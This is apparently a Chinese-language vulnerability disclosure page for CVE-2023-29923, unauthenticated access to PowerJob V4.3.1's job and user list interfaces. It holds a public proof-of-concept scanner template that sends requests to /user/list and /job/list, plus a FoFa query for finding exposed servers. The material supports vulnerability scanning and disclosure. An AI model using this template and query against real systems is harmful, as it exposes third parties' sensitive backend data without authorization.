漏洞描述
PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.PowerJob存在未授权访问漏洞,攻击者发送构造的数据包可未授权获取后台敏感信息。FoFa:title=="PowerJob"
CVE-2023-29923: PowerJob-unauth
PoC代码[已公开]
id: CVE-2023-29923
info:
name: PowerJob-unauth
author: li1u
severity: medium
verified: true
description: |-
PowerJob V4.3.1 is vulnerable to Insecure Permissions. via the list job interface.PowerJob存在未授权访问漏洞,攻击者发送构造的数据包可未授权获取后台敏感信息。FoFa:title=="PowerJob"
reference:
- https://www.cve.org/CVERecord?id=CVE-2023-29923
- https://nvd.nist.gov/vuln/detail/CVE-2023-29923
tags: cve,cve2023,unauth,powerjob
created: 2023/05/26
rules:
r0:
request:
method: GET
path: /user/list
expression: response.status == 200 && response.body.bcontains(b'"success":true')&& response.body.bcontains(b'"username"')
stop_if_mismatch: true
r1:
request:
method: POST
path: /job/list
headers:
Content-Type: application/json
body: '{"appId":1,"index":0,"pageSize":10}'
expression: response.status == 200 && response.body.bcontains(b'"success":true')&& response.body.bcontains(b'"message"')
expression: r0() && r1()